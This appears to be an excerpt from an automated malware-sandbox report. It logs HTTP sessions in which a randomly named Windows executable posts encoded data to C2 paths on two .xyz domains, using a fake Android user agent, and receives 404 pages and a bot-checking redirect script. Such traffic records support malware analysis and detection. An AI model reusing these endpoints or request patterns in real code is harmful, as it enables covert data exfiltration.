                                                      Data Ascii: 00yp=K6/Uh+zm+SZaqWAAh4jBs4a5ArM34RNh/LGpTtOfa45BrHPkrX3E0M9qgQlg9EZanak2eSTNZcQRa70CJYSqgqSTlYdBhhyuyxkeE2Ri4x6IAposzBVLsK1+woTA+2wCJ6XyvBIUWuX+7UtFr1cLMvOPEEKL0S9NxN6Yrf4oP9HoXOwIFTsDg5HntnIQn2VXgAUS9qBhJUgltUHIuax6t/Kz8kyoX0N4+BpcQEm1QP28URUE/vm1HLh9LHKgdbGNkjjGLdjBf4ZOBWsolC5PgUy55iXCLfCDmt1q+BvSqJQNaSjXiMjLGRRUKnj67wcZ4f++iSkeIDHtD5ukFJcNqYo3QmEi1CvUCKcM7pYDoJLvLNif5OBmehVa8+Y80tZ8BMUk22FdB0hBahe6FrufZPaXnlKFeDJ3d/xAtqpBAreWq4v0fcZ8GGQM2s9ARFPnwGUZ1BxArYqClYBmznmH7ArbB9cOzNsRg0M4+RZrMLlv3BLOnnKUmh2v2V9KRxKAzaZgi8PxWUafjCX6bxYCbgfpDqbnXbDMOgtdGQM1xf6ic5pjDNa9r3wM2IyCHx5DbR6mi0k6Od7qjUYeQnulLfCTNmQ5HG6MOiaoXx8PdP2o/F9S7tVZa3g5IqZ6IBItEVzQM+PvlOK8Xi4k4Zboxk8bpy2ELGw8cgycyizdirgH9w4pvFanBqrTjdkZm0WN8DNbVfrLGRllXSF2pSuUk3h4kK2dPa1LjJrhnROVn5t3opgfSRufyCylfeKDhWga416OrWncSP5ywfA5BJhT7zXjYSq1ADFfMnkjUhkRjeCI4DhbRKzKM4iuAqBN6eKg29pD1Ny8vo9stx1wtkHnnAqnoq1sYqz7i7Qd9e4xwwbG40zYyMa/oNk2RfUL3BWuuxga9s3L0S0tOMktzWD7Ay0oc2AITx3aIMAK9bPJmO4uw0Vz/rNFgzo1cufkHaJQxAYy6q7ePlBwqV0B3cKUatvV/yGOxynI/yW37r6j2RrU+Ra [TRUNCATED]
                                                      Sep 19, 2024 15:07:00.959911108 CEST231OUTData Raw: 2b 74 73 46 79 6f 57 46 6e 67 57 68 6f 30 57 75 71 76 78 50 4a 6e 71 33 45 44 75 75 45 47 42 6d 75 51 55 50 79 6b 4d 6f 6b 77 41 46 4a 6a 44 56 73 57 69 37 73 53 30 49 33 70 79 48 49 38 59 69 48 31 58 64 41 52 41 63 76 55 65 6b 41 52 77 6e 6e 77
                                                      Data Ascii: +tsFyoWFngWho0WuqvxPJnq3EDuuEGBmuQUPykMokwAFJjDVsWi7sS0I3pyHI8YiH1XdARAcvUekARwnnw0Ql11LajbXpodleEqeGABEj3MHEjKzu2t6fHv65hasQB47HrLTVapkIPlfxniar2kKpDqTSDEYxwAefb8Tnt3BQi0Io2H5kmy//HT/5AvwdF/h7kP/gmaatScAn0MblC+jVNtor9f1Rw3V4siYhI5
                                                      Sep 19, 2024 15:07:01.634581089 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Thu, 19 Sep 2024 13:07:01 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.224920065.21.196.90802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:03.581443071 CEST742OUTPOST /vkua/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.030003302.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.030003302.xyz
                                                      Referer: http://www.030003302.xyz/vkua/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 4b 36 2f 55 68 2b 7a 6d 2b 53 5a 61 71 52 30 41 67 74 58 42 74 59 61 35 4e 4c 4d 33 71 52 4e 6e 2f 4c 62 63 54 73 4c 48 61 50 64 42 72 57 2f 6b 72 69 44 45 6e 38 39 31 30 41 6c 73 67 55 5a 31 6e 61 6b 51 65 57 54 4e 5a 63 45 52 63 75 6f 43 65 74 6d 6c 74 36 53 52 2b 49 64 4d 68 68 75 56 79 78 67 56 45 31 42 69 34 7a 75 49 42 74 30 73 34 45 42 4c 36 71 31 6b 79 6f 53 49 2b 32 38 4c 4a 36 48 70 76 46 49 55 58 66 4c 2b 36 46 4e 46 38 79 77 4c 57 66 4f 4f 49 6b 4c 41 35 77 73 41 38 71 61 31 6f 73 59 61 4f 75 54 51 54 75 73 76 43 41 38 57 72 73 44 55 6e 77 64 2b 6a 30 51 46 30 51 3d 3d
                                                      Data Ascii: 00yp=K6/Uh+zm+SZaqR0AgtXBtYa5NLM3qRNn/LbcTsLHaPdBrW/kriDEn8910AlsgUZ1nakQeWTNZcERcuoCetmlt6SR+IdMhhuVyxgVE1Bi4zuIBt0s4EBL6q1kyoSI+28LJ6HpvFIUXfL+6FNF8ywLWfOOIkLA5wsA8qa1osYaOuTQTusvCA8WrsDUnwd+j0QF0Q==
                                                      Sep 19, 2024 15:07:04.238034964 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Thu, 19 Sep 2024 13:07:04 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.224920165.21.196.90802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:06.159301043 CEST2472OUTPOST /vkua/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.030003302.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.030003302.xyz
                                                      Referer: http://www.030003302.xyz/vkua/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 4b 36 2f 55 68 2b 7a 6d 2b 53 5a 61 72 78 6b 41 6d 4b 4c 42 6d 59 61 34 43 72 4d 33 34 52 4e 6a 2f 4c 48 63 54 74 4f 66 61 36 4e 42 72 46 33 6b 73 48 33 45 6c 38 39 31 6a 51 6c 67 39 45 5a 5a 6e 65 4d 63 65 53 58 7a 5a 65 6f 52 61 2b 59 43 4a 66 2b 71 6c 71 53 54 73 34 64 44 68 68 75 36 79 31 45 52 45 31 45 4e 34 7a 32 49 42 66 73 73 2b 30 42 49 31 4b 31 6b 79 6f 53 55 2b 32 39 2f 4a 36 65 76 76 42 73 45 57 73 54 2b 36 6b 74 46 36 6c 63 4d 55 66 4f 4b 57 30 4b 4a 30 53 78 65 78 4e 36 63 72 66 64 31 50 39 4c 6f 57 63 34 49 46 53 73 41 39 35 48 67 70 6e 49 51 6a 32 56 4a 67 41 55 4f 39 71 42 68 4a 52 38 6c 73 45 48 49 75 62 78 31 67 66 4b 7a 79 45 79 31 54 31 77 42 2b 42 38 2f 51 45 57 66 52 38 61 38 53 69 38 45 37 66 6d 31 51 4c 68 7a 4c 48 4b 78 57 37 47 52 6b 6a 4c 34 4c 64 7a 52 66 34 5a 4f 42 55 55 6f 68 51 42 50 67 45 79 35 78 43 58 42 43 2f 43 63 6d 75 59 4a 2b 41 62 53 71 4e 30 4e 59 67 37 58 6b 4b 50 4d 4a 42 52 56 64 33 6a 43 71 67 63 32 34 62 66 6a 69 53 63 67 49 48 44 74 44 [TRUNCATED]
                                                      Data Ascii: 00yp=K6/Uh+zm+SZarxkAmKLBmYa4CrM34RNj/LHcTtOfa6NBrF3ksH3El891jQlg9EZZneMceSXzZeoRa+YCJf+qlqSTs4dDhhu6y1ERE1EN4z2IBfss+0BI1K1kyoSU+29/J6evvBsEWsT+6ktF6lcMUfOKW0KJ0SxexN6crfd1P9LoWc4IFSsA95HgpnIQj2VJgAUO9qBhJR8lsEHIubx1gfKzyEy1T1wB+B8/QEWfR8a8Si8E7fm1QLhzLHKxW7GRkjL4LdzRf4ZOBUUohQBPgEy5xCXBC/CcmuYJ+AbSqN0NYg7XkKPMJBRVd3jCqgc24bfjiScgIHDtD/ykAocNroo0XmEuxCjiCJ9f7q12oKfvLcifu8Z5RxVY5+YmjdYSBMAe23JdCA1BZh+6CauQb/aQlVKSQjJjd/kTtoRRA6uW4Yv0Z+B/O2QJ/M9WalPPwGV91ARPrMCClYRm9R6H7ArUCNcE6toJg0B/+RsmMINv3SjOnmKUqh2v618DKBL1zaNKi+OMWkOfjkb6Z30CdAfvFqbmKLD7OhddGQYlxeCidYpjDvi9yHwI6oyjHx5pbQOhi3dHObrqjVYeB1WlG/CQLmR+DG78OiSGXxpYdO+o+ldSoMVZaXg7EKZ6TxJuEUavM6bVlMq8WTokwZbr9E8UmS2HPGwucgicynrdiogH9B4p4EanJ6rVs9kHsRPq8D9mVevbGQJlFwt2uRGVrnhEhK2hLa1jjJrlnVCFgJN3mcsfTwucvyyuV+LV8mg64xmorXTMS+lywcI5B6JT6DXjYSq2ADFbMmYdUj87jeCIqH1bR4rKCYirCqBWrOK629tp1NKavr5stkhwtkHkqQqklK1vYq/Mi7Qj9e0xxCXG5hnYzuC/+9k2WfUI9hWvuxgK9uTb0XYtfoUtylrkIi0pUWBJYQKaIMdV9fPJm/Iuxhpz/bNFozo2IefLZq1yxEAY6rrOMX5wqlEBkdKbV9vuySGQxy7B/yOv7qCz2TbU/xa [TRUNCATED]
                                                      Sep 19, 2024 15:07:06.164273977 CEST1695OUTData Raw: 2b 70 73 46 79 59 57 46 6e 41 57 68 59 30 52 7a 71 76 30 45 5a 6e 78 2b 6b 44 69 75 45 48 77 6d 76 73 79 50 30 49 4d 6f 32 49 41 46 38 58 44 56 63 57 6b 69 38 53 6e 46 58 6b 74 48 49 77 45 69 47 70 74 64 51 78 41 4e 4a 51 65 68 79 70 77 6a 48 77
                                                      Data Ascii: +psFyYWFnAWhY0Rzqv0EZnx+kDiuEHwmvsyP0IMo2IAF8XDVcWki8SnFXktHIwEiGptdQxANJQehypwjHw3eF14Lan3Xp4BlaAEfzwBFT3MMm7N3u2r5fGv65g9sQJ87G3bTRWpkKXlfBnhMr2qHJDsTSeQYx5hefL8Tlp3Cwy0Po2HxEmz2fGTxZ8oweYBw9MsqQCdDsWSGGkbKVKCikt2vLQOwzUKC9ciVlgw24G1ZV6U3Kme
                                                      Sep 19, 2024 15:07:06.835082054 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Thu, 19 Sep 2024 13:07:06 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.224920265.21.196.90802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:08.696088076 CEST474OUTGET /vkua/?00yp=H4X0iIfcuDR/51hvqrfWv+fBB4gw1DJH+OHHMfulTPpinGKmiwvV0bR+rgtd9UluzvoyGSPCeaIsA9B2OO6wneeytNJ9oAaYwF4aKTQt7TjjQdxEyAl8xbFhx+zF&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.030003302.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:07:09.374624968 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Thu, 19 Sep 2024 13:07:09 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.2249203172.81.61.224802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:07:14.446952105 CEST2472OUTPOST /1tk5/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.moritynomxd.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.moritynomxd.xyz
                                                      Referer: http://www.moritynomxd.xyz/1tk5/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 64 32 71 44 58 77 41 55 38 4d 44 57 6d 67 6b 5a 66 37 43 56 69 57 38 51 59 71 4f 58 74 75 42 6c 4a 72 2f 66 66 63 67 6d 79 65 6d 67 4c 38 58 42 36 65 67 77 65 7a 66 67 79 31 50 50 4c 4c 39 50 63 66 6a 47 41 44 32 48 49 6a 64 35 6b 6e 6d 36 65 4e 54 79 46 50 38 67 43 68 43 6a 73 42 64 4e 46 75 68 56 4b 68 6c 32 7a 6c 75 75 63 39 73 38 71 72 73 6a 67 42 38 6a 4e 50 45 77 2f 41 35 56 68 77 77 43 59 46 71 55 38 38 33 67 6e 48 42 48 32 43 57 42 51 34 66 7a 38 53 41 2f 72 7a 68 55 59 49 37 39 32 4d 38 31 72 46 32 72 30 42 7a 41 48 71 4e 4b 67 59 32 74 44 52 47 52 6d 49 44 34 51 76 34 2b 4c 4b 62 44 2b 59 67 54 37 73 78 49 32 38 44 35 66 41 43 65 48 37 51 4e 6e 6b 5a 75 56 78 6f 70 4c 34 62 78 64 6b 35 31 6a 46 4d 51 44 6e 42 50 51 41 48 42 54 56 33 57 32 6d 6a 36 54 5a 4e 48 73 79 2f 36 75 6e 43 58 39 64 53 55 73 59 44 63 4b 70 36 6e 7a 74 6f 77 6b 4a 6e 73 62 5a 4b 38 4e 62 66 44 32 69 42 48 71 75 68 48 44 47 58 53 34 5a 71 31 4f 53 35 73 72 4d 6b 67 6b 46 53 49 66 71 48 2f 5a 4d 68 34 44 [TRUNCATED]
                                                      Data Ascii: 00yp=d2qDXwAU8MDWmgkZf7CViW8QYqOXtuBlJr/ffcgmyemgL8XB6egwezfgy1PPLL9PcfjGAD2HIjd5knm6eNTyFP8gChCjsBdNFuhVKhl2zluuc9s8qrsjgB8jNPEw/A5VhwwCYFqU883gnHBH2CWBQ4fz8SA/rzhUYI792M81rF2r0BzAHqNKgY2tDRGRmID4Qv4+LKbD+YgT7sxI28D5fACeH7QNnkZuVxopL4bxdk51jFMQDnBPQAHBTV3W2mj6TZNHsy/6unCX9dSUsYDcKp6nztowkJnsbZK8NbfD2iBHquhHDGXS4Zq1OS5srMkgkFSIfqH/ZMh4DJBt+1GzCZJRyAfVOu5OFuzyLLq4UgUuAC+Ol9cF6YIPOKIAkRvw/0WFcRg3Fy0dYziG97/JC1vuZPbE2GgR/pVDHK+y5Xetqj4cU1n1mtpZGhTEoaopXfSntccu+MvLUoH6og/zjod9UmWeQf+M5SjSI3EhWxaBS3aB4U9f9ohoeq3gEFVt9WxDQvTgfoImcPb7gFJaoOeoM8sBNI8+ChgpnZHFqgrs+G8qokKiDhC3OEh8Ydmvq0RblgdlFYDHPLzH2dyeGSwqrBIVM6pskL02QoMXa+IaNyDLCgkbpZkoptyxPgdskQ+PxA4P+gTux04uY7ah9dn/maSuJXsDSp8FwewD8n5LNsCMBMbSLTom+Iz/2uNkUQnKbMxATHLrcuMemhhZ6WdWrS5MvGGOM5x/vOX1UKxztGTd1tva1pux6ibFZLABc3MBMo2A3KxL3goD5n28P4incBYe9XPGFYVka9DdinBk/vuTmF6EKeQg4VFf8NL+OgHAHDz1T44p7wfSjCQMwXlNRMF1R4nyM4ceosrJODG200Ov+fOvgccQJVedZQ11cgb+DAg0lWqdRU7lj+qrpBNILe8jevOATr48ujqsnvAlJ1151AAtzBVyuL4N9kycVrQHAA9cpfiG9Zk+p5YyivfGOmClsFw0l8TGBfzl8YxJ41Z [TRUNCATED]
                                                      Sep 19, 2024 15:07:14.452004910 CEST237OUTData Raw: 72 35 72 51 75 4f 70 66 4f 5a 50 59 35 4b 4e 7a 4a 41 69 6c 63 7a 41 75 75 6f 73 78 4f 6d 61 44 49 51 50 4c 43 68 6d 75 4e 5a 6b 36 55 65 53 4b 66 72 56 4c 7a 6d 35 55 65 44 58 6c 53 53 4c 51 75 75 2b 61 30 6a 4f 4c 63 54 74 54 56 34 44 73 51 54
                                                      Data Ascii: r5rQuOpfOZPY5KNzJAilczAuuosxOmaDIQPLChmuNZk6UeSKfrVLzm5UeDXlSSLQuu+a0jOLcTtTV4DsQTLwF1sOv87L0pM1eMtUS6iSE3kmjOfz//uya8+A9wjEJIjorCW8+K4Q+JsPnFKQsZyBrLcnqDlN1oyc0kmtBYGR7da7h1p9nb+bPRxPRZrVb7iR9nt+A3IdW/BnMe865f991V+duL0mPMXjxWYva7vx9rl5x
                                                      Sep 19, 2024 15:07:15.138988972 CEST728INHTTP/1.1 200 OK
                                                      Content-Type: text/html; charset=utf-8
                                                      X-Address: gin_throttle_mw_7200000000_8.46.123.33
                                                      X-Ratelimit-Limit: 500
                                                      X-Ratelimit-Remaining: 499
                                                      X-Ratelimit-Reset: 1726754834
                                                      Date: Thu, 19 Sep 2024 13:07:14 GMT
                                                      Content-Length: 458
                                                      Connection: close
                                                      Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
